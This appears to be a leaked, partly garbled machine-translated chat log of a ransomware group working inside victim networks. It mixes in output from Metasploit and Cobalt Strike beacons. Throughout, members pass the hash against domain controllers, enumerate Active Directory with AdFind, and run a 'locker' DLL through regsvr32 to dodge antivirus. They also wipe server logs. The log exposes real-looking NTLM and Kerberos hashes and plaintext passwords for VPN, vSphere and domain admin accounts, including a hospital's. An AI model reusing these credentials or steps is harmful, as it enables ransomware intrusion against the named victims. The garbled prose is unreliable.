[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\CDW.Tech2:aad3b435b51404eeaad3b435b51404ee:3cdfe7a54e967455e5bebe64525583783b'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\cisadmin:aad3b435b51404eeaad3b435b51404ee:aa5bda0004c32ef20e32cad3d570018f'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\jyrkwa:aad3b435b51404eeaad3b435b51404ee:ce52742a372f62d7100e9ca7b5f13369'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\OnPremMigAdmin1:aad3b435b51404eeaad3b435b51404ee:f004e3bd8070f91f2e92ff45f69f1525'
[-] 192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5'
[-] 192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\pmpetecc:aad3b435b51404eeaad3b435b51404ee:4df15363fbf1bf8218e9e77ee0808ea5'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\Psupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\PsSupport:aad3b435b51404eeaad3b435b51404ee:8c3c72c186ece567004a620aff55d842'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\tms01:aad3b435b51404eeaad3b435b51404ee:a6aea38d860ac5c1e980a7724bd0362e
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0de1b16eb'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\WebAdmin:aad3b435b51404eeaad3b435b51404ee:83fdf8f37840cf8e171223c0de1b16eb'
[+] 192.168.254.92:445 - 192.168.254.92:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91eb5f8cad8a6cad7b'
[+] 192.168.254.93:445 - 192.168.254.93:445 - Success: 'lrhc\frsecure:aad3b435b51404eeaad3b435b51404ee:6888441821d91eb5f8cad8a6cad7b'
[-] 192.168.254.92:445 - 192.168.254.92:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978765f867'
[-] 192.168.254.93:445 - 192.168.254.93:445 - Failed: 'lrhc\lljennbi:aad3b435b51404eeaad3b435b51404ee:2cd71f9ad45c45c9bd25eb978765f867',
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
and the cob is not there yet after checking the admins can learn psh empire + in three logins then one by one lA then the current one then the trust onewrite only login passno like domain is written separatelycertainly i forgot just think all at once fuck all or first so, then so and so in the file write domain or in SMBDomain all separately specify?domain is specified as a separate option in smb_login then there is still a question about the domain of trustas the domain of the current one i.e. without domaine even with 3da?with domain also or as you said before just LA check without domaina or not...so the question is about USERPASS_FILE in smb_loginok to work through hash empire in the current domain instead of coboy that's why i asked so why are you telling me about it))) and speaking of hash empire and win2003 ok or at least the new cobap talk more) how will LA on dk in the domain check hashes as agreed do not touch it so do you really pull in hash empire 2003?hashm can work with hashes hashmapokay at once backup check admins new coba will be a couple of hours so how network admins configure the equipment and using what is a long discussion and about private just stop at some open source with data on cobas and other utilities honestly do not want to deal with this topic now after closing the network coba immediately dirty shit you gave him a coba net as @user4 works then?you've been working with them for a long time everyone's coba is in the bleep everyone's coba is in the bleep all my coba is in the bleep all my coba is in the bleep all my coba is in the bleep all your coba is in the bleep
C:\Users\wevvewe\Desktop>ping google.com

Pinging google.com [172.217.4.238] with 32 bytes of data:
Reply from 172.217.4.238: bytes=32 time=30ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127
Reply from 172.217.4.238: bytes=32 time=31ms TTL=127

Ping statistics for 172.217.4.238:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 30ms, Maximum = 31ms, Average = 30ms

C:\Users\wevvewe\Desktop>ping fullref.com

Pinging fullref.com [45.128.156.27] with 32 bytes of data:
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127
Reply from 45.128.156.27: bytes=32 time=65ms TTL=127

Ping statistics for 45.128.156.27:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 65ms, Maximum = 65ms, Average = 65ms

C:\Users\wevvewe\Desktop>ping wikibros.com

Pinging wikibros.com [198.18.0.1] with 32 bytes of data:
Request timed out.
Request timed out.
Request timed out.
I think it's better to ping the domain above than to ping it, then the plan is to ping it, have you tried emire yet?) and by the way, a question on million ping `fullref.com` google pings but does not ping cobbs? does dupn see external? and tell me that the same answers are like this23[.]106[.]160[.]61 cobaltoy the fuck maybe I misunderstood something not all at once said of course, and more specifically? colleagues10[. ]10[. ]and so on[. ]who said?i was told so here in quotes and apostropheswithin the wrong waywikibros.com cobalt "wikibros.com" cobalt) and how to google it?
the name of the domain sends to the fandom by mariowse the window as I say ask colleagues who work for gofer how to understand it directly says: tvoya koba zasvechena tikay s gorody similar just no? Beware YOU BLEED IF YOU SEE THIS DOMAIN/IPI will be directly written if my koba zasvechena, how to understand it?and along the way check admin check the ipi of the domain list "ipi" kobaltvot recently checked check it out I think it has not lighted up? i your colleagues recently said that their combs lighted up100% losya all of our combs pinged from the dedic and dk current domaina about combs ping wideio.com not respond I did not about it at all on 2003 vverchela net the current sees2003 tpsh not see your combs how new?i can't see all tpsh but can't see all msf but can't see all msf?and behind the vpn coba can not be seen you go to trasttak dedik behind the vpn do token adminh I understand in the process can turn the dedik to cobus hashemi what to do then conditionally 1-2 approached dana lanachinajunneti start to run in turn on both dc you go to kmd5 again 1 to 1c their hashemi take current dc and eatam conditional burthwhy?yes a lot of things but how to treat that without the ability to create a token through the hash that with hash you can brute force it I understand with hash and smb_login likes hashesa meaning of those who I DID brute force passwords are the same a hash for all) clearing creeds are for 4 `` ``
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
admin Administrator AvamarBackupUser
CDW.Tech1 CDW.Tech2 CDW.Tech3
cdw.user01 cisadmin frsecure
gsnelson jyrkwa lljennbi
nmsapps OnPremMigAdmin1 OnPremMigAdmin2
OnPremMigAdmin3 pmpetecc PRHADMIN
PsService PsSupport Pssupport01
radmin tms01 TMSXE.Service01
UCAdmin WebAdmin
The command completed successfully.
```
```
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
Administrator frsecure jyrkwa
PsService PsSupport Pssupport01
svc-aadc tms01 TMSXE.Service01
UCAdmin
The command completed successfully.
``I'm already confused what do we call them here in terms of a new grid or a team server? I checked yesterday, but do not remember who
i sure did
```
lrhc\Administrator
svc-aadc
mcklrh\svc-aadc
lrhc\svc-aadc
In 2 hours we'll issue a new cobu in general, run all YES, EA on DC trasta can brute force)
The request will be processed at a domain controller for domain mcklrh.mig.

Force user logoff how long after time expires?: Never
Minimum password age (days): 0
Maximum password age (days): Unlimited
Minimum password length: 5
Length of password history maintained: 1
Lockout threshold: Never
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: PRIMARY
The command completed successfully.
even if 0 bytesfiles were created so it was ok with the rights you can check in windows\temp to cast doubts but although it's 2003 mbe there was not enough rights to the root ...but since you said you tried it in the root of the disk, it's gone. i told you to check windows\temp but yesProgramData is not a folder in 2003 by the way i just noticed yesterday i did it from the psb and it gave me an error i'll try to make a dll on the dd and from there i'll make enum_ad_* in the msf thinking something will happen here so i went to the msf but it's not right, right?that's how i tried it originally -dedeepic -domaindrive - trust survey and there is a connection through wmc under the credentials yes run the files that take the hell off the trust which you specified in the batnickets from the dedicates send files to take hell off inside the domain on some server thought) this is the only machine available that this is a bug in it i can refer to win2003cmb_login the thing is that your car is not officially in the domain + from the context try to make a request through the trace from the car domain through the meter from trusts i'm trying to make a request through vomi from trusts?i tried to make a request through the trac the domain through the trusts I tried to make a request through the mesper from the trac?
i'm using msf17 from my default gateway sitting behind their VPN, but meter is on my VPN, i thought it would work without it, but i have to pull session to default gateway in msf do a search for enum_ad_*in msf there is a module enum_ad_uessers by the way i do not understand why, @user8 has a session there?where did you put it?) https is not supported https:// how to download files to the car through tpsh? i can not do ita seems to see the external? no chotaa check unatted fileswhere vmikom, where ms17 and so on and so forth do you run commands there through ms17?i don't have it yet, it cuts me off when i put it on my harddisk, even though i disabled the windup, were there any invok-kerbs on the pshkerbs?i don't see it in the processes of the current domaincertainly on the current machine it is in the processes but on the other hand i don't see it in the processes maybe there's sofos there's another guess i also think sofos and tried to root it there's probably sofos wortha meaning try to copy hell to this folderagainly such filesi wont get it into the terminal i won't throw it in the dir
C:\Program Files\Microsoft Azure AD Sync\UIShell>tasklist /s 192.168.254.107 /v
tasklist /s 192.168.254.107 /v

Image Name PID Session Name Session# Mem Usage User Name CPU Time
========================= ======== ================ =========== ============ ================================================== ============
System Idle Process 0 Console 0 16 K NT AUTHORITY\SYSTEM 4152:02:24
System 4 Console 0 268 K NT AUTHORITY\SYSTEM 0:19:18
smss.exe 456 Console 0 496 K NT AUTHORITY\SYSTEM 0:00:00
csrss.exe 876 Console 0 4,236 K NT AUTHORITY\SYSTEM 0:02:07
winlogon.exe 916 Console 0 13,652 K NT AUTHORITY\SYSTEM 0:00:08
services.exe 960 Console 0 66,924 K NT AUTHORITY\SYSTEM 3:56:01
lsass.exe 972 Console 0 27,744 K NT AUTHORITY\SYSTEM 0:28:38
svchost.exe 1152 Console 0 3,568 K NT AUTHORITY\SYSTEM 0:00:00
svchost.exe 1604 Console 0 4,820 K NT AUTHORITY\NETWORK SERVICE 0:20:17
SavService.exe 1684 Console 0 260,956 K NT AUTHORITY\LOCAL SERVICE 4:45:31
svchost.exe 1428 Console 0 6,224 K NT AUTHORITY/NETWORK SERVICE 0:00:06
svchost.exe 1444 Console 0 7,272 K NT AUTHORITY\LOCAL SERVICE 0:00:02
svchost.exe 1492 Console 0 25,288 K NT AUTHORITY\SYSTEM 1:57:11
spoolsv.exe 556 Console 0 5,704 K NT AUTHORITY\SYSTEM 0:00:52
msdtc.exe 580 Console 0 5,048 K NT AUTHORITY/NETWORK SERVICE 0:00:00
avagent.exe 476 Console 0 9,012 K NT AUTHORITY\SYSTEM 2:05:38
cpqrcmc.exe 1380 Console 0 1,380 K NT AUTHORITY\SYSTEM 0:00:00
vcagent.exe 1408 Console 0 7,800 K NT AUTHORITY\SYSTEM 0:00:00
tuner.exe 1572 Console 0 2,664 K NT AUTHORITY\SYSTEM 0:00:09
svchost.exe 1732 Console 0 2,644 K NT AUTHORITY\SYSTEM 0:00:00
INETDSRV.exe 1924 Console 0 2,872 K NT AUTHORITY\SYSTEM 0:00:00
machd.exe 1960 Console 0 1,960 K NT AUTHORITY\SYSTEM 0:00:00
nmserver.exe 252 Console 0 3,832 K NT AUTHORITY\SYSTEM 0:00:00
ntfrs.exe 772 Console 0 1,616 K NT AUTHORITY\SYSTEM 0:00:19
svchost.exe 836 Console 0 15,168 K NT AUTHORITY\LOCAL SERVICE 0:11:34
RCMDSVC.EXE 1460 Console 0 1,220 K NT AUTHORITY\SYSTEM 0:00:00
SAVAdminService.exe 1808 Console 0 4,300 K NT AUTHORITY\SYSTEM 0:00:18
snmp.exe 2116 Console 0 7,052 K NT AUTHORITY\SYSTEM 0:04:09
ALsvc.exe 2216 Console 0 1,828 K NT AUTHORITY\SYSTEM 0:00:20
McsAgent.exe 2412 Console 0 16,440 K NT AUTHORITY\SYSTEM 0:11:23
McsClient.exe 2568 Console 0 7,952 K NT AUTHORITY\NETWORK SERVICE 0:00:05
swc_service.exe 2688 Console 0 4,668 K NT AUTHORITY\SYSTEM 0:00:00
swi_service.exe 2744 Console 0 29,560 K NT AUTHORITY\SYSTEM 0:00:05
smhstart.exe 3048 Console 0 3,848 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3180 Console 0 12,280 K NT AUTHORITY\SYSTEM 0:00:01
cpqnimgt.exe 3244 Console 0 6,248 K NT AUTHORITY\SYSTEM 0:00:00
cqmgserv.exe 3304 Console 0 3,584 K NT AUTHORITY\SYSTEM 0:00:15
cqmgstor.exe 3352 Console 0 5,680 K NT AUTHORITY\SYSTEM 0:00:33
dfssvc.exe 3384 Console 0 3,884 K NT AUTHORITY\SYSTEM 0:00:00
sysdown.exe 3476 Console 0 2,036 K NT AUTHORITY\SYSTEM 0:00:00
cqmghost.exe 3632 Console 0 8,232 K NT AUTHORITY\SYSTEM 4:49:33
wmiprvse.exe 3660 Console 0 8,020 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3852 Console 0 2,560 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3860 Console 0 2,540 K NT AUTHORITY\SYSTEM 0:00:00
hpsmhd.exe 3916 Console 0 18,236 K NT AUTHORITY\SYSTEM 0:00:01
rotatelogs.exe 3988 Console 0 2,572 K NT AUTHORITY\SYSTEM 0:00:00
rotatelogs.exe 3996 Console 0 2,552 K NT AUTHORITY\SYSTEM 0:00:00
wmiprvse.exe 5168 Console 0 38,700 K NT AUTHORITY/NETWORK SERVICE 3:27:29
svchost.exe 5992 Console 0 12,236 K NT AUTHORITY\SYSTEM 0:00:22
alg.exe 6136 Console 0 3,696 K NT AUTHORITY\LOCAL SERVICE 0:00:00
logon.scr 4272 Console 0 2,004 K NT AUTHORITY\LOCAL SERVICE 0:00:00
minituner.exe 4816 Console 0 2,732 K NT AUTHORITY\SYSTEM 0:00:00
```
 
 
 
```
02/08/2020 03:56 PM 134 Sophos AutoUpdate 5.8.358 setup log 20200208 155610.txt
``I can't put it in the meter where do you have a map in general through Үshare dir C:\windows\temp but inside it doesn't show that there is such a folder it just tells me dir Y:\ProgramData\as if I write it in the dir I am not allowed in at all? and on 2003 some av is*did not seem to have anyone yesterday, I'll re-screen the process list is anyone interesting?i had a chance to beat it with psh, but it's 2003, only there was a vulnerability 2003 I wrote myself added lA via ms17 on a 2003 server no one with admin privileges + general EA check here current user who joined the domain as lA
[+] 192.168.254.92:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC01) (domain:MCKLRH)
[+] 192.168.254.93:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:RADDC02) (domain:MCKLRH)
``````
Get list of DCs in domain '' from '\\RadDC01.mcklrh.mig'.
    RADDC02.mcklrh.mig [DS] Site: Default-First-Site-Name
    RADDC01.mcklrh.mig [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully
``from kmd``nltest /dclist:``you're hilarious)`` I never figured out how to take a list of dc's via kmd, but I guess in the output smb_version all dc's were taken?[ ] (https://mediaeveryone.com/group/lrhc-org?msg=SJGwmz8PfccJxvxKz) and sometimes just hung up[ ] (https://mediaeveryone.com/group/lrhc-org?msg=qEA6bRBWBs5fgK4MW) in this variant, files of size 0? either 0 objects, or ERROR: 0x1 ``
AdFind.exe -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
 
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" > ad_usr.txt
 
AdFind.exe -b DC=mcklrh,DC=mig -f "(objectcategory=person)" -h 192.168.254.107 > ad_usr.txt
``I've done this remotely if I drop 0 bytes files``
C:\ProgramData\AdFind.exe -f "(objectcategory=person)" > C:\ProgramData\ad_usr.txt
C:\ProgramData\AdFind.exe -f "objectcategory=computer" > C:\ProgramData\ad_comp.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=organizationalUnit)" > C:\ProgramData\ad_ous.txt
C:\ProgramData\AdFind.exe -subnets -f (objectCategory=subnet) > C:\ProgramData\subnets.txt
C:\ProgramData\AdFind.exe -f "(objectcategory=group)" > C:\ProgramData\ad_group.txt
C:\ProgramData\AdFind.exe -gcb -sc trustdmp > C:\ProgramData\trustdmp.txt
``[ ](https://mediaeveryone.com/group/lrhc-org?msg=ZWhp95o9pM6t8Hj8F) give me the start command + the contents of the batch + the copy command[ ](https://mediaeveryone.com/group/lrhc-org?msg=XwZdctaDSWS7Rjkjr), or even that doesn't work? Are you kidding me and take it off?what's the problem with addfind in the trust car? i'm telling you it's not working))))dat you have a single entry point to the trust, i've uploaded the trust to the msf and now i have the current domain there.without flag kipi dll is not deleted but no session nopsh/randll the process hangs in kobuni in tpsh in msfvvodnotshere draw the trust also no wayokay understood tried to drop in the trust domain eh and batnick and run remotely tried in the current domain specifying trust domain/host dk trust domain described it)how did you remove hell from trusts?and the last question to close this dialogue is it clear? and he gave me - 0 objects i know that there are at least a few computers on the server windup if it was not a computer the latter could be considered true i got either an error or hanging, or 0 objects and so already tried to remove hell infupot added there LA of the three trusts one in quarantine
of the remaining two I have access to one
in this one i used ms17 to request YES and EA all the same described trustakkaha how did you find then users....file was empty and when it was an error was in the console did you have an error or i do not understand? i reshot trusts without output to file and files 0 bytes the point of lit you do not fill files to confukerb i did not shoot, now i will do if 1, i reshot trusts yesterday and there nothing has changed
if 2, i already wrote that i failed to take them down[ ](https://mediaeveryone.com/group/lrhc-org?msg=TScXrhybTsQ7gZhsa) in terms of re-scanning from the current domain or hell
UPDATE added functionality to the option to run the locker, which removes some of the AV detects when dropping it to disk
Run via regsvr32

regsvr32.exe /s locker.dll - without arguments
regsvr32.exe /s /n /i: "here arguments" - with arguments
``#corp-televisa-com-mx#pcsb-org what do you have in the works at the moment? thanks ``yufdvfte5645warKHAGBSD``380fd7621d03826307b8993ad84c2ecf) waiting for hashes in the root changes everything) ah, well, once pressed do not trust ... on tilyufonin not trust, I pressed the hashes, the places clears[ ](https://mediaeveryone.I don't trust tilufonin don't trust me, I clicked it, there are hashes and clears[ ]() com/channel/general?msg=MpgDjanMwbZxXyA6c) to the work pc you hooked a personal iphone? but here's what is it, I have to get dirty again and scour conferences I also have not all left after reinstallingI clean everything immediately after closing the entire computer. I sprinkle holy water.I'm not talking about the last weekdastop, in general, for all the time? I'm talking about all the cases for all time)there in the archive 2 files, 1 - ntlm, 2 - clears40 archives will not download) all ntlm in one archivemake in one file is not necessary divide the groups into the sameoba format will do a file only ntlm?
```
c933798f947972ca9d08ba805008d6ca
```
or is this okay?
```
CORP\lkperezcer:::8d3fe083b7e1fcb6f7a069fb8d7a75f5:::
``[ ](https://mediaeveryone.com/channel/general?msg=EQ2NwKzr46SjeK49M) silent. not let me in, cookies are rotten all your ntlm hashes me in the archives collect from their casesmoy have fallen off - I'll try to re-enter them from public resourcesyou task for half an hour maximum - to collect the biggest lists of clean passwords + you have networks at workdobre gancet so on tasks for todaya, everything okIt's strange you two in my networkNo one of them is bazetted anywhere?hi all hellohi:moyai:that logs are stored in a folderada and in the blog says as I understanda unpackedkobalt not through installa and it is unlikely the logs will be somewhere elsekucha folders are empty only found logs and backups ubunta make a restart old sessions will fall in some other place where the backup is there is an option to restart? may be that the server remembers them because they were deleted during his work?
root@hostname:~/cobalt/logs# ls
201203
root@hostname:~/cobalt/logs# cd 201203
root@hostname:~/cobalt/logs/201203# ls
events.log weblog_443.log

``I can't tell you the solution to tebetout I can't tell you the solution to beaconlog but again, there's nothing to do with the logs. Have you cleaned the logs?
root@hostname:~/cobalt/logs# rm -r *
root@hostname:~/cobalt/logs# ls
root@hostname:~/cobalt/logs#

Should ``to``~/cobalt/logs/` this folder have been deleted directly all logs for all numbers?
root@hostname:~/cobalt/logs/201201# ls
root@hostname:~/cobalt/logs/201201#

``But there are still logs left in the second and third there is only information in the logs that I entered and left it for the first number and folders rm -r *two logs I moved to /home/
the rest rm * did you delete all logs? on the server deleted the contents of the folder 201201 i have no logs, no archives to synchronize together and the local client cleaned then the contents of the folder logs comes to 20k and starts 1 byte per second and not vice versa nu log it is saved from actions in the coben understood?in home move it should help? i just go into the koba and it creates a new one exactly the same - throw out the folder kobeda))) the same logs well yes from here `~/cobalt/logs/201201/139.62.193.40 ` here put
``~/cobalt/logs`` move the logs to another place adfind the damn thing``
beacon_1851575246.log
``)okei year-month-numberand this is the datagram for the number on which the problem occurred``
root@hostname:~/cobalt/logs# ls
201020 201023 201026 201029 201101 201104 201107 201110 201113 201116 201119 201122 201125 201128 201201
201021 201024 201027 201030 201102 201105 201108 201111 201114 201117 201120 201123 201126 201129 201202
201022 201025 201028 201031 201103 201106 201109 201112 201115 201118 201121 201124 201127 201130 201203

``Delete everything?
root@104.243.40.126:13063
f826w8LY1XdqJnrmtr1inZqLv2UAPkk4ecv
``and I didn't give you access)``ssh: connect to host 104.243.40.126 port 22: Connection refused``
``ssh: connect to host likenic.com port 22: Connection refused``
`ssh: connect to host likenic.com port 38542: Connection refused `csh won't let me onto the 21556 freespool
104.243.40.126:38542
JI07HSLOl2MtjxWe0UhqpolvHLJPZCAcL6M
``Give me access to the coba where all this shit happens what's the "can't get it done" theme and not try anything to fix it? i can't get access to citrix, i can't get access to citrix, i can't get access to citrix, i can't get access to citrix, i can't get access to citrix, i can't get access to citrix
https://vlab.unf.edu/vpn/index.html
N01447311
Commercial5207!
´´so I do) check better from the host from where access the same machine + ideally on the same machine at all)? sox open in the same range where the host from which took the logins / I do not know, I have not faced), not allowed from our dedik, the credentials valid ``https://10.0.254.1:44433/cloudBackupSettings.html_COPYtl2 or there are other options how to be? and watch the backupsnado accesses in their lk search there now will check with the server where found dkheh, no) soks throw from where took accesses?egl_admin\E@gle@x1s3030 and the creeds valedvidimodimo only on the rdp from their server works, but the granddick will not let e in the center found with access and only av? well, yes, perhaps when you start a build it can be removed if suspicious behavior and is not removed on static?) on some servers are 3-4 edr lolnonu crypto what the starter?and does not seem to be touched by anythingNoooo, with the disabled windefa starter will not be removedThe important thing is that you know where to go to get into the admin areaThen remove the browser, or go to his pk where access to webroute and do everything from therewith a high probability in webroute is a twofactor phonesuperlogin
```
URL : https://accounts.logme.in/ ( https://accounts.logme.in/login.aspx )
Username : tomw@itc-us.com
Password: Logmein123
``````
--- Chromium Credential (User: briang) ---
URL : http://itc-ship01/
Username : briang
Password : bdg2301

--- Chromium Credential (User: briang) ---
URL : http://itc-plm01/
Username : briang
Password : 194880195718849108860819488019597884910886001948801958988491088605194880195528849108854019488019538884910885421948801954088491088524

```
sbs pass )10.0.0.20
```
Bitdefender
Malwarebytes Anti-Exploit
Malwarebytes' Anti-Malware
Seagull Security

``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITC-DC-SVR01.ITC.LOCAL
IPAddress : 10.0.0.14
SessionFrom :
SessionFromName :
LocalAdmin :
``````
UserDomain : ITC
UserName : superlogin
ComputerName : ITCMA-FILE02.ITC.LOCAL
IPAddress : 10.0.0.38
SessionFrom :
SessionFromName :
LocalAdmin :
``More effective in terms of service accts try through sharpview - it's otherwise searched already and with the token of the superlogin itself this tried with the token, yes@user8 under YES token did you run it?
if yes - it still might not work because there will be no authorization dc events if the account is a service one with a dc token
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe superlogin
[*] Tasked beacon to run .NET program: SharpSniper.exe superlogin
[+] host called home, sent: 113727 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
``There's an interesting admin
```
User name superlogin
Full Name superlogin
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 5/21/2018 9:56:11 PM
Password expires Never
Password changeable 5/21/2018 9:56:11 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators *ADSyncAdmins
Global Group memberships *Server Management *Discovery Management
                             *Hypervisor Access - V*Domain Users
                             *VMware Admins *Domain Admins
                             *Records Management *All ITC
                             *Recipient Management *Mailbox support
                             *Public Folder Manageme*Organization Manageme
                             *SHOPTRAK CHINA USERS *SQL Access - FULL SER

The admin accounts have this thing on the desktop
```
screen mode id:i:2
use multimon:i:0
desktopwidth:i:1920
desktopheight:i:1080
session bpp:i:24
winposstr:s:0,1,158,316,1182,1040
compression:i:1
keyboardhook:i:2
audiocapturemode:i:0
videoplaybackmode:i:1
connection type:i:7
networkautodetect:i:1
bandwidthautodetect:i:1
displayconnectionbar:i:1
enableworkspacereconnect:i:0
disable wallpaper:i:0
allow font smoothing:i:0
allow desktop composition:i:0
disable full window drag:i:1
disable menu anims:i:1
disable themes:i:0
disable cursor setting:i:0
bitmapcachepersistenable:i:1
full address:s:remote.itc-us.com
audiomode:i:0
redirectprinters:i:1
redirectcomports:i:0
redirectsmartcards:i:1
redirectclipboard:i:1
redirectposdevices:i:0
autoreconnection enabled:i:1
prompt for credentials:i:0
negotiate security layer:i:1
remoteapplicationmode:i:0
alternate shell:s:
shell working directory:s:
gatewayhostname:s:
gatewayusagemethod:i:4
gatewaycredentialssource:i:4
gatewayprofileusagemethod:i:0
promptcredentialonce:i:0
gatewaybrokeringtype:i:0
use redirection server name:i:0
rdgiskdcproxy:i:0
kdcproxyname:s:
drivestoredirect:s:*
authentication level:i:2
username:s:itc\
devicestoredirect:s:*
``when you get there, don't forget the proxy from the admin pcwebrootanywhere.com/v1/Account/loginand the admin where? outside? user9user4user3https://www.ixbt.com/power/ups/multilink.shtmlна dc
```
beacon> shell type C:\MultiLink\README.txt
[*] Tasked beacon to run: type C:\MultiLink\README.txt
[+] host called home, sent: 59 bytes
[+] received output:
README.TXT for Liebert MultiLink

Liebert developed MultiLink to protect computers from costly damage such as
loss of data resulting from power failures -- from single computers to large
networks. MultiLink constantly monitors one or more Liebert Uninterruptible
Power Supply (UPS), warns computer users of impending power loss and initiates
graceful operating system shutdowns when needed.

MultiLink on a host computer communicates with a Liebert UPS using network or
direct cable connections to detect loss of utility power and the status of the
UPS battery. For network communications, MultiLink employs the SNMP protocol
and IP addresses. For direct cable connections, MultiLink uses either serial
communications or contact closure, depending on the UPS model.

The MultiLink Advanced Shutdown version adds data analysis and notification
capabilities to the standard MultiLink shutdown features. This product permits
configurable responses to UPS status changes, including support for e-mail,
pagers, and command actions.  MultiLink Advanced Shutdown also offers data
logging functionality to capture and trend historical data for trouble-shooting
and analysis.

For updates to MultiLink software or to purchase the MultiLink Advance Shutdown
version, visit http://multilink.liebert.com.


Technical Support:

U.S.A. +1 800-222-5877
Outside the U.S.A. +1 614-841-6755
France +33 (0) 1 43 60 01 77
Germany +49 89 90 50 070
Italy +39 02 98250 324
Netherlands +31 (0) 33 2474072
U.K.                +44 (0) 1628 403200
Spain +34 902 100 494
E-mail liebert.monitoring@emerson.com
Web Site http://multilink.liebert.com


The Company Behind the Products:

With over a million installations around the globe, Liebert
is the world leader in computer protection systems. Since
its founding in 1965, Liebert has developed a complete range
of support and protection systems for sensitive electronics:

- Environmental systems: close-control air conditioning from
  1.5 to 60 tons.
- Power conditioning and UPS with power ranges from 250 VA to
  more than 1000 kVA.
- Integrated systems that provide both environmental and power
  protection in a single, flexible package.
- Monitoring and control -- from systems of any size or location,
  on-site or remote.
- Service and support through more than 100 service centers
  around the world, and a 24/7 Customer Response Center.


Copyright (c) 1997-2013 Liebert Corporation.
All rights reserved throughout the world. Specifications subject
to change without notice.
Liebert, the Liebert logo, and MultiLink are registered
trademarks of Liebert Corporation.

``So here it is a little bit higher on the hell 6956 were alive at once how many servers pinganu more servers and start razbirazbaem build determine method ``SIODFGO&DSIUgfsgFUT%UYESYTGU ``user8user7user4user3)`` in case it will be useful ta)))
$krb5tgs$23$*agpm_admin$korbel.com agpmadmin
``EDR
Netwrix.korbel.com [10.10.1.94] NETWRIX SERVER
```
```
URL : https://www.netwrix.com/sign_in.html
Username : ben.mandeville@korbel.com
Password : vZjFu3cH
``vSphere
```
https://vcenter.korbel.com/
Username : ben.mandeville@korbel.com
Password : 1234qwerASDF!@#$
``quietbk 6okay +2 hoursThis is 14 hours to rest 10 of which 2 on the road preparing to closeWhy so early? Tomorrow by 4 then is it over? nail the living 99
42 restored.
42 closed/applied for/killed the process
erased
I'm gonna wipe it all outMAIN\blove wingnut12#
MAIN\Administrator cr1spy173
MAIN\rthomas !@#monstrosity2002
172.93.110.218:54536
wEjNq0mz7Dji7TjM6Xv3LIovTZIndMQkbj
``````
crhs-security.main.crispregional.org
CRRHPUMP2.main.crispregional.org

ERROR: The RPC server is unavailable.
```

```
PYXIS-CCE-PROD.main.crispregional.org

ERROR: Logon failure: unknown user name or bad password.
```

```
NovaNet.main.crispregional.org

Didn't display the tosslist without an error
``````
Admin
G0F0rw@rd123!
10.75.0.170
10.75.0.171
10.75.0.172
10.1.0.170
10.1.0.171
10.1.0.172
``````
crhsesxi20.main.crispregional.org
crhsesxi21.main.crispregional.org
crhsesxi22.main.crispregional.org
crhsesxi23.main.crispregional.org
crhsesxi24.main.crispregional.org
crhsesxi25.main.crispregional.org
crhsesxi26.main.crispregional.org
crhsesxi27.main.crispregional.org
``total
```
pyxistest.main.crispregional.org
